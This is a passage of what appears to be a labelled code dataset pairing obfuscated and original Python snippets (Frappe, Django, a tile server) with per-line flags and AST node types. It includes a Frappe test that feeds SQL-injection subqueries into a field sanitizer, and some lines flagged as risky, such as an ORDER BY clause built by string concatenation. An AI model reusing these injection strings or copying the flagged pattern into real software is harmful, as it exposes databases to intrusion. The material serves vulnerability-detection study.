"data = DatabaseQuery('Event').execute(filters={'starts_on': ['between', [\n '2016-07-07']]}, fields=['name'])\n",
"self.assertTrue({'name': event3.name} in data)\n",
"self.assertTrue({'name': event4.name} in data)\n",
"self.assertTrue({'name': todays_event.name} in data)\n",
"self.assertTrue({'name': event1.name} not in data)\n",
"self.assertTrue({'name': event2.name} not in data)\n",
"def test_ignore_permissions_for_get_filters_cond(self):...\n",
"frappe.set_user('[email protected]')\n",
"self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict\n (istable=1), [])\n",
"self.assertTrue(get_filters_cond('DocType', dict(istable=1), [],\n ignore_permissions=True))\n",
"frappe.set_user('Administrator')\n",
"def test_query_fields_sanitizer(self):...\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, version()'], limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (select name from tabUser), count(name))'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name', 'issingle, (select count(*) from tabSessions)'],\n limit_start=0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n \"issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;\"], limit_start=\n 0, limit_page_length=1)\n",
"self.assertRaises(frappe.DataError, DatabaseQuery('DocType').execute,\n fields=['name',\n 'issingle, IF(issingle=1, (SELECT name from tabUser), count(*))'],\n limit_start=0, limit_page_length=1)\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'count(name)'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('count(name)' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n \"locate('', name) as _relevance\"], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('_relevance' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'date(creation) as creation'], limit_start=0, limit_page_length=1)\n",
"self.assertTrue('creation' in data[0])\n",
"data = DatabaseQuery('DocType').execute(fields=['name', 'issingle',\n 'datediff(modified, creation) as date_diff'], limit_start=0,\n limit_page_length=1)\n",
"self.assertTrue('date_diff' in data[0])\n",
"def create_event(subject='_Test Event', starts_on=None):...\n",
"\"\"\"docstring\"\"\"\n",
"from frappe.utils import get_datetime\n",
"event = frappe.get_doc({'doctype': 'Event', 'subject': subject,\n 'event_type': 'Public', 'starts_on': get_datetime(starts_on)}).insert(\n ignore_permissions=True)\n",
"return event\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4
] | [
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"For",
"Expr'",
"For",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Docstring",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"FunctionDef'",
"Docstring",
"ImportFrom'",
"Assign'",
"Return'"
] |
[
"def FUNC_13(self, VAR_9, VAR_10=None, VAR_11=None, VAR_17='', VAR_18='',...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_28 = self.get_and_check_task(VAR_9, VAR_10, VAR_11)\n",
"VAR_29 = VAR_28.get_tile_path(VAR_17, VAR_18, VAR_19)\n",
"if os.path.isfile(VAR_29):\n",
"VAR_32 = open(VAR_29, 'rb')\n",
"return HttpResponse(FileWrapper(VAR_32), content_type='image/png')\n"
] | [
"def get(self, request, pk=None, project_pk=None, z='', x='', y=''):...\n",
"\"\"\"docstring\"\"\"\n",
"task = self.get_and_check_task(request, pk, project_pk)\n",
"tile_path = task.get_tile_path(z, x, y)\n",
"if os.path.isfile(tile_path):\n",
"tile = open(tile_path, 'rb')\n",
"return HttpResponse(FileWrapper(tile), content_type='image/png')\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_8(self, VAR_17, VAR_18, VAR_19):...\n",
"\"\"\"docstring\"\"\"\n",
"if not VAR_17:\n",
"return self.CreateError('Step name must be specified', 400)\n",
"if not VAR_18:\n",
"return self.CreateError('Test name must be specified', 400)\n",
"if VAR_19 and not VAR_19.isdigit():\n",
"return self.CreateError('Bug id must be an int', 400)\n",
"return None\n"
] | [
"def _ValidateInput(self, step_name, test_name, bug_id):...\n",
"\"\"\"docstring\"\"\"\n",
"if not step_name:\n",
"return self.CreateError('Step name must be specified', 400)\n",
"if not test_name:\n",
"return self.CreateError('Test name must be specified', 400)\n",
"if bug_id and not bug_id.isdigit():\n",
"return self.CreateError('Bug id must be an int', 400)\n",
"return None\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"from django.db import models, migrations\n",
"from django.utils import timezone\n",
"import datetime\n",
"import exercise.submission_models\n",
"import lib.helpers\n",
"import exercise.exercise_models\n",
"import lib.fields\n",
"VAR_0 = [('inheritance', '0001_initial'), ('userprofile', '0001_initial'),\n ('course', '0001_initial')]\n",
"VAR_1 = [migrations.CreateModel(name='CourseModule', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('name', models.CharField(max_length=255)), (\n 'points_to_pass', models.PositiveIntegerField(default=0)), (\n 'introduction', models.TextField(blank=True)), ('opening_time', models.\n DateTimeField(default=timezone.now)), ('closing_time', models.\n DateTimeField(default=timezone.now)), ('late_submissions_allowed',\n models.BooleanField(default=False)), ('late_submission_deadline',\n models.DateTimeField(default=timezone.now)), ('late_submission_penalty',\n lib.fields.PercentField(default=0.5, help_text=\n 'Multiplier of points to reduce, as decimal. 0.1 = 10%')), (\n 'course_instance', models.ForeignKey(related_name='course_modules', to=\n 'course.CourseInstance'))], options={'ordering': ['closing_time', 'id']\n }, bases=(models.Model,)), migrations.CreateModel(name=\n 'DeadlineRuleDeviation', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'extra_minutes', models.IntegerField())], options={'abstract': False},\n bases=(models.Model,)), migrations.CreateModel(name='LearningObject',\n fields=[('modelwithinheritance_ptr', models.OneToOneField(parent_link=\n True, auto_created=True, primary_key=True, serialize=False, to=\n 'inheritance.ModelWithInheritance')), ('order', models.IntegerField(\n default=0)), ('name', models.CharField(max_length=255)), ('description',\n models.TextField(blank=True)), ('instructions', models.TextField(blank=\n True)), ('service_url', models.URLField(blank=True))], options={},\n bases=('inheritance.modelwithinheritance',)), migrations.CreateModel(\n name='BaseExercise', fields=[('learningobject_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.LearningObject')), (\n 'allow_assistant_grading', models.BooleanField(default=False)), (\n 'min_group_size', models.PositiveIntegerField(default=1)), (\n 'max_group_size', models.PositiveIntegerField(default=1)), (\n 'max_submissions', models.PositiveIntegerField(default=10)), (\n 'max_points', models.PositiveIntegerField(default=100)), (\n 'points_to_pass', models.PositiveIntegerField(default=40))], options={\n 'ordering': ['course_module__closing_time', 'course_module', 'order',\n 'id']}, bases=('exercise.learningobject',)), migrations.CreateModel(\n name='ExerciseWithAttachment', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise')), ('files_to_submit',\n models.CharField(help_text=\n 'File names that user should submit, use pipe character to separate files',\n max_length=200, blank=True)), ('attachment', models.FileField(upload_to\n =exercise.exercise_models.build_upload_dir))], options={\n 'verbose_name_plural': 'exercises with attachment'}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'AsynchronousExercise', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise'))], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'LearningObjectCategory', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), ('name',\n models.CharField(max_length=35)), ('description', models.TextField(\n blank=True)), ('points_to_pass', models.PositiveIntegerField(default=0)\n ), ('course_instance', models.ForeignKey(related_name='categories', to=\n 'course.CourseInstance')), ('hidden_to', models.ManyToManyField(\n related_name='hidden_categories', null=True, to=\n 'userprofile.UserProfile', blank=True))], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='MaxSubmissionsRuleDeviation',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('extra_submissions', models.\n IntegerField())], options={'abstract': False}, bases=(models.Model,)),\n migrations.CreateModel(name='StaticExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise')),\n ('exercise_page_content', models.TextField()), (\n 'submission_page_content', models.TextField())], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name='Submission',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('submission_time', models.\n DateTimeField(auto_now_add=True)), ('hash', models.CharField(default=\n lib.helpers.get_random_string, max_length=32)), ('feedback', models.\n TextField(blank=True)), ('assistant_feedback', models.TextField(blank=\n True)), ('status', models.CharField(default=b'initialized', max_length=\n 32, choices=[(b'initialized', 'Initialized'), (b'waiting', 'Waiting'),\n (b'ready', 'Ready'), (b'error', 'Error')])), ('grade', models.\n IntegerField(default=0)), ('grading_time', models.DateTimeField(null=\n True, blank=True)), ('service_points', models.IntegerField(default=0)),\n ('service_max_points', models.IntegerField(default=0)), (\n 'submission_data', lib.fields.JSONField(blank=True)), ('grading_data',\n lib.fields.JSONField(blank=True))], options={'ordering': [\n '-submission_time']}, bases=(models.Model,)), migrations.CreateModel(\n name='SubmittedFile', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('param_name',\n models.CharField(max_length=128)), ('file_object', models.FileField(\n max_length=255, upload_to=exercise.submission_models.build_upload_dir)),\n ('submission', models.ForeignKey(related_name='files', to=\n 'exercise.Submission'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='SynchronousExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise'))],\n options={}, bases=('exercise.baseexercise',)), migrations.AddField(\n model_name='submission', name='exercise', field=models.ForeignKey(\n related_name='submissions', to='exercise.BaseExercise'),\n preserve_default=True), migrations.AddField(model_name='submission',\n name='grader', field=models.ForeignKey(related_name=\n 'graded_submissions', blank=True, to='userprofile.UserProfile', null=\n True), preserve_default=True), migrations.AddField(model_name=\n 'submission', name='submitters', field=models.ManyToManyField(\n related_name='submissions', to='userprofile.UserProfile'),\n preserve_default=True), migrations.AddField(model_name=\n 'maxsubmissionsruledeviation', name='exercise', field=models.ForeignKey\n (related_name='maxsubmissionsruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='maxsubmissionsruledeviation', name='submitter', field=\n models.ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='maxsubmissionsruledeviation',\n unique_together=set([('exercise', 'submitter')])), migrations.\n AlterUniqueTogether(name='learningobjectcategory', unique_together=set(\n [('name', 'course_instance')])), migrations.AddField(model_name=\n 'learningobject', name='category', field=models.ForeignKey(related_name\n ='learning_objects', to='exercise.LearningObjectCategory'),\n preserve_default=True), migrations.AddField(model_name='learningobject',\n name='course_module', field=models.ForeignKey(related_name=\n 'learning_objects', to='exercise.CourseModule'), preserve_default=True),\n migrations.AddField(model_name='deadlineruledeviation', name='exercise',\n field=models.ForeignKey(related_name='deadlineruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='deadlineruledeviation', name='submitter', field=models.\n ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='deadlineruledeviation',\n unique_together=set([('exercise', 'submitter')]))]\n"
] | [
"from django.db import models, migrations\n",
"from django.utils import timezone\n",
"import datetime\n",
"import exercise.submission_models\n",
"import lib.helpers\n",
"import exercise.exercise_models\n",
"import lib.fields\n",
"dependencies = [('inheritance', '0001_initial'), ('userprofile',\n '0001_initial'), ('course', '0001_initial')]\n",
"operations = [migrations.CreateModel(name='CourseModule', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('name', models.CharField(max_length=255)), (\n 'points_to_pass', models.PositiveIntegerField(default=0)), (\n 'introduction', models.TextField(blank=True)), ('opening_time', models.\n DateTimeField(default=timezone.now)), ('closing_time', models.\n DateTimeField(default=timezone.now)), ('late_submissions_allowed',\n models.BooleanField(default=False)), ('late_submission_deadline',\n models.DateTimeField(default=timezone.now)), ('late_submission_penalty',\n lib.fields.PercentField(default=0.5, help_text=\n 'Multiplier of points to reduce, as decimal. 0.1 = 10%')), (\n 'course_instance', models.ForeignKey(related_name='course_modules', to=\n 'course.CourseInstance'))], options={'ordering': ['closing_time', 'id']\n }, bases=(models.Model,)), migrations.CreateModel(name=\n 'DeadlineRuleDeviation', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'extra_minutes', models.IntegerField())], options={'abstract': False},\n bases=(models.Model,)), migrations.CreateModel(name='LearningObject',\n fields=[('modelwithinheritance_ptr', models.OneToOneField(parent_link=\n True, auto_created=True, primary_key=True, serialize=False, to=\n 'inheritance.ModelWithInheritance')), ('order', models.IntegerField(\n default=0)), ('name', models.CharField(max_length=255)), ('description',\n models.TextField(blank=True)), ('instructions', models.TextField(blank=\n True)), ('service_url', models.URLField(blank=True))], options={},\n bases=('inheritance.modelwithinheritance',)), migrations.CreateModel(\n name='BaseExercise', fields=[('learningobject_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.LearningObject')), (\n 'allow_assistant_grading', models.BooleanField(default=False)), (\n 'min_group_size', models.PositiveIntegerField(default=1)), (\n 'max_group_size', models.PositiveIntegerField(default=1)), (\n 'max_submissions', models.PositiveIntegerField(default=10)), (\n 'max_points', models.PositiveIntegerField(default=100)), (\n 'points_to_pass', models.PositiveIntegerField(default=40))], options={\n 'ordering': ['course_module__closing_time', 'course_module', 'order',\n 'id']}, bases=('exercise.learningobject',)), migrations.CreateModel(\n name='ExerciseWithAttachment', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise')), ('files_to_submit',\n models.CharField(help_text=\n 'File names that user should submit, use pipe character to separate files',\n max_length=200, blank=True)), ('attachment', models.FileField(upload_to\n =exercise.exercise_models.build_upload_dir))], options={\n 'verbose_name_plural': 'exercises with attachment'}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'AsynchronousExercise', fields=[('baseexercise_ptr', models.\n OneToOneField(parent_link=True, auto_created=True, primary_key=True,\n serialize=False, to='exercise.BaseExercise'))], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name=\n 'LearningObjectCategory', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), ('name',\n models.CharField(max_length=35)), ('description', models.TextField(\n blank=True)), ('points_to_pass', models.PositiveIntegerField(default=0)\n ), ('course_instance', models.ForeignKey(related_name='categories', to=\n 'course.CourseInstance')), ('hidden_to', models.ManyToManyField(\n related_name='hidden_categories', null=True, to=\n 'userprofile.UserProfile', blank=True))], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='MaxSubmissionsRuleDeviation',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('extra_submissions', models.\n IntegerField())], options={'abstract': False}, bases=(models.Model,)),\n migrations.CreateModel(name='StaticExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise')),\n ('exercise_page_content', models.TextField()), (\n 'submission_page_content', models.TextField())], options={}, bases=(\n 'exercise.baseexercise',)), migrations.CreateModel(name='Submission',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('submission_time', models.\n DateTimeField(auto_now_add=True)), ('hash', models.CharField(default=\n lib.helpers.get_random_string, max_length=32)), ('feedback', models.\n TextField(blank=True)), ('assistant_feedback', models.TextField(blank=\n True)), ('status', models.CharField(default=b'initialized', max_length=\n 32, choices=[(b'initialized', 'Initialized'), (b'waiting', 'Waiting'),\n (b'ready', 'Ready'), (b'error', 'Error')])), ('grade', models.\n IntegerField(default=0)), ('grading_time', models.DateTimeField(null=\n True, blank=True)), ('service_points', models.IntegerField(default=0)),\n ('service_max_points', models.IntegerField(default=0)), (\n 'submission_data', lib.fields.JSONField(blank=True)), ('grading_data',\n lib.fields.JSONField(blank=True))], options={'ordering': [\n '-submission_time']}, bases=(models.Model,)), migrations.CreateModel(\n name='SubmittedFile', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('param_name',\n models.CharField(max_length=128)), ('file_object', models.FileField(\n max_length=255, upload_to=exercise.submission_models.build_upload_dir)),\n ('submission', models.ForeignKey(related_name='files', to=\n 'exercise.Submission'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='SynchronousExercise', fields=[(\n 'baseexercise_ptr', models.OneToOneField(parent_link=True, auto_created\n =True, primary_key=True, serialize=False, to='exercise.BaseExercise'))],\n options={}, bases=('exercise.baseexercise',)), migrations.AddField(\n model_name='submission', name='exercise', field=models.ForeignKey(\n related_name='submissions', to='exercise.BaseExercise'),\n preserve_default=True), migrations.AddField(model_name='submission',\n name='grader', field=models.ForeignKey(related_name=\n 'graded_submissions', blank=True, to='userprofile.UserProfile', null=\n True), preserve_default=True), migrations.AddField(model_name=\n 'submission', name='submitters', field=models.ManyToManyField(\n related_name='submissions', to='userprofile.UserProfile'),\n preserve_default=True), migrations.AddField(model_name=\n 'maxsubmissionsruledeviation', name='exercise', field=models.ForeignKey\n (related_name='maxsubmissionsruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='maxsubmissionsruledeviation', name='submitter', field=\n models.ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='maxsubmissionsruledeviation',\n unique_together=set([('exercise', 'submitter')])), migrations.\n AlterUniqueTogether(name='learningobjectcategory', unique_together=set(\n [('name', 'course_instance')])), migrations.AddField(model_name=\n 'learningobject', name='category', field=models.ForeignKey(related_name\n ='learning_objects', to='exercise.LearningObjectCategory'),\n preserve_default=True), migrations.AddField(model_name='learningobject',\n name='course_module', field=models.ForeignKey(related_name=\n 'learning_objects', to='exercise.CourseModule'), preserve_default=True),\n migrations.AddField(model_name='deadlineruledeviation', name='exercise',\n field=models.ForeignKey(related_name='deadlineruledeviations', to=\n 'exercise.BaseExercise'), preserve_default=True), migrations.AddField(\n model_name='deadlineruledeviation', name='submitter', field=models.\n ForeignKey(to='userprofile.UserProfile'), preserve_default=True),\n migrations.AlterUniqueTogether(name='deadlineruledeviation',\n unique_together=set([('exercise', 'submitter')]))]\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4
] | [
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Assign'",
"Assign'"
] |
[
"from django.core.exceptions import PermissionDenied\n",
"from django.template.response import SimpleTemplateResponse\n",
"from lib.viewbase import BaseMixin, BaseTemplateView\n",
"from authorization.permissions import ACCESS\n",
"from .models import UserProfile\n",
"VAR_0 = ACCESS.STUDENT\n",
"VAR_1 = True\n",
"def FUNC_0(self):...\n",
"super().get_resource_objects()\n",
"VAR_2 = self.request.user\n",
"if VAR_2.is_authenticated():\n",
"self.profile = VAR_3 = VAR_2.userprofile\n",
"self.profile = None\n",
"self.is_external_student = VAR_3.is_external\n",
"self.is_external_student = False\n",
"self.note('profile', 'is_external_student')\n"
] | [
"from django.core.exceptions import PermissionDenied\n",
"from django.template.response import SimpleTemplateResponse\n",
"from lib.viewbase import BaseMixin, BaseTemplateView\n",
"from authorization.permissions import ACCESS\n",
"from .models import UserProfile\n",
"access_mode = ACCESS.STUDENT\n",
"login_redirect = True\n",
"def get_resource_objects(self):...\n",
"super().get_resource_objects()\n",
"user = self.request.user\n",
"if user.is_authenticated():\n",
"self.profile = profile = user.userprofile\n",
"self.profile = None\n",
"self.is_external_student = profile.is_external\n",
"self.is_external_student = False\n",
"self.note('profile', 'is_external_student')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_6(self):...\n",
"if self._owned:\n",
"if self._listenerthread != threading.current_thread():\n",
"self._conn.close()\n",
"self._listenerthread.join(VAR_6=1.0)\n",
"self._check_handlers()\n",
"if self._listenerthread.is_alive():\n",
"warnings.warn('session listener still running')\n"
] | [
"def _close(self):...\n",
"if self._owned:\n",
"if self._listenerthread != threading.current_thread():\n",
"self._conn.close()\n",
"self._listenerthread.join(timeout=1.0)\n",
"self._check_handlers()\n",
"if self._listenerthread.is_alive():\n",
"warnings.warn('session listener still running')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Condition",
"Expr'"
] |
[
"def FUNC_2(self, VAR_5=None, VAR_6=None, VAR_7='', VAR_8=''):...\n",
"if VAR_6:\n",
"VAR_5 = VAR_6.apply_all(VAR_5)\n",
"if VAR_7 != '':\n",
"if hasattr(self.obj, VAR_7):\n",
"return VAR_5\n",
"if hasattr(getattr(self.obj, VAR_7), '_col_name'):\n",
"VAR_5 = VAR_5.order_by(VAR_7 + ' ' + VAR_8)\n",
"VAR_7 = getattr(getattr(self.obj, VAR_7), '_col_name')\n"
] | [
"def _get_base_query(self, query=None, filters=None, order_column='',...\n",
"if filters:\n",
"query = filters.apply_all(query)\n",
"if order_column != '':\n",
"if hasattr(self.obj, order_column):\n",
"return query\n",
"if hasattr(getattr(self.obj, order_column), '_col_name'):\n",
"query = query.order_by(order_column + ' ' + order_direction)\n",
"order_column = getattr(getattr(self.obj, order_column), '_col_name')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
4,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Return'",
"Condition",
"Assign'",
"Assign'"
] |
[
"def FUNC_11(self, VAR_13):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_26 = self.add_argument_group('ParlAI Image Preprocessing Arguments')\n",
"VAR_26.add_argument('--image-size', type=int, default=256, help=\n 'resizing dimension for images')\n",
"VAR_26.add_argument('--image-cropsize', type=int, default=224, help=\n 'crop dimension for images')\n"
] | [
"def add_image_args(self, image_mode):...\n",
"\"\"\"docstring\"\"\"\n",
"parlai = self.add_argument_group('ParlAI Image Preprocessing Arguments')\n",
"parlai.add_argument('--image-size', type=int, default=256, help=\n 'resizing dimension for images')\n",
"parlai.add_argument('--image-cropsize', type=int, default=224, help=\n 'crop dimension for images')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_13(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_52, VAR_46 = FUNC_12(VAR_0)\n",
"if VAR_46:\n",
"return FUNC_6(VAR_46)\n",
"VAR_64 = TestCaseRun.objects.filter(pk__in=data['runs'])\n",
"VAR_65 = VAR_52['bug_system_id']\n",
"VAR_66 = VAR_52['bugs']\n",
"validate_bug_id(VAR_66, VAR_65)\n",
"return FUNC_6(VAR_94(e))\n",
"VAR_67 = VAR_52['bz_external_track']\n",
"VAR_68 = VAR_52['action']\n",
"if VAR_68 == 'add':\n",
"return FUNC_6(VAR_94(e))\n",
"return FUNC_7()\n",
"for FUNC_28 in VAR_64:\n",
"VAR_102 = Bug.objects.filter(bug_id__in=bug_ids)\n",
"for bug_id in VAR_66:\n",
"for FUNC_28 in VAR_64:\n",
"FUNC_28.add_bug(bug_id=bug_id, VAR_65=bug_system_id, VAR_67=bz_external_track)\n",
"for bug in VAR_102:\n",
"if bug.case_run_id == FUNC_28.pk:\n",
"FUNC_28.remove_bug(bug.bug_id, FUNC_28.pk)\n"
] | [
"def update_bugs_to_caseruns(request):...\n",
"\"\"\"docstring\"\"\"\n",
"data, error = clean_bug_form(request)\n",
"if error:\n",
"return say_no(error)\n",
"runs = TestCaseRun.objects.filter(pk__in=data['runs'])\n",
"bug_system_id = data['bug_system_id']\n",
"bug_ids = data['bugs']\n",
"validate_bug_id(bug_ids, bug_system_id)\n",
"return say_no(str(e))\n",
"bz_external_track = data['bz_external_track']\n",
"action = data['action']\n",
"if action == 'add':\n",
"return say_no(str(e))\n",
"return say_yes()\n",
"for run in runs:\n",
"bugs = Bug.objects.filter(bug_id__in=bug_ids)\n",
"for bug_id in bug_ids:\n",
"for run in runs:\n",
"run.add_bug(bug_id=bug_id, bug_system_id=bug_system_id, bz_external_track=\n bz_external_track)\n",
"for bug in bugs:\n",
"if bug.case_run_id == run.pk:\n",
"run.remove_bug(bug.bug_id, run.pk)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Return'",
"For",
"Assign'",
"For",
"For",
"Expr'",
"For",
"Condition",
"Expr'"
] |
[
"def FUNC_5(self, VAR_5):...\n",
"if VAR_5 in self.groups:\n",
"self.groups.remove(VAR_5)\n",
"for oldg in VAR_5.get_ancestors():\n",
"if oldg.name != 'all':\n",
"for childg in self.groups:\n",
"if oldg in childg.get_ancestors():\n"
] | [
"def remove_group(self, group):...\n",
"if group in self.groups:\n",
"self.groups.remove(group)\n",
"for oldg in group.get_ancestors():\n",
"if oldg.name != 'all':\n",
"for childg in self.groups:\n",
"if oldg in childg.get_ancestors():\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"For",
"Condition",
"For",
"Condition"
] |
[
"def FUNC_17(VAR_16):...\n",
"VAR_0.info('Login Error for %s' % VAR_5.args['username'][0])\n",
"VAR_0.info('%s' % VAR_16)\n",
"VAR_5.setResponseCode(UNAUTHORIZED)\n",
"return self._render_template(VAR_5, 'Invalid credentials')\n"
] | [
"def render_error(error):...\n",
"log.info('Login Error for %s' % request.args['username'][0])\n",
"log.info('%s' % error)\n",
"request.setResponseCode(UNAUTHORIZED)\n",
"return self._render_template(request, 'Invalid credentials')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_2(VAR_4, VAR_5, VAR_6, VAR_7=nsxlib_testcase.NSX_CERT, VAR_8=None,...\n",
"return FUNC_1(VAR_4, VAR_5, VAR_6, VAR_7=verify, VAR_8=data, VAR_9=headers,\n VAR_11=single_call)\n"
] | [
"def assert_json_call(verb, client_or_resource, url, verify=nsxlib_testcase....\n",
"return assert_call(verb, client_or_resource, url, verify=verify, data=data,\n headers=headers, single_call=single_call)\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"\"\"\"\nCreated on Mon Jan 1 21:38:13 2018\n\n@author: Adam\n\"\"\"\n",
"import codecs\n",
"import re\n",
"import time\n",
"import warnings\n",
"from serial import SerialException, Serial\n",
"from .tools import get_serial_settings\n",
"from .base import Device\n",
"\"\"\" communication with a serial device \"\"\"\n",
"def __init__(self, VAR_0, VAR_1=False):...\n",
"self.settings = VAR_0\n",
"self.serial_settings = get_serial_settings(VAR_0)\n",
"self.sensors = VAR_0.get('sensors', None)\n",
"self.cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n",
"self.regex = VAR_0.get('regex', None)\n",
"self.debug = VAR_1\n",
"if self.debug:\n",
"print('serial settings:', self.serial_settings)\n",
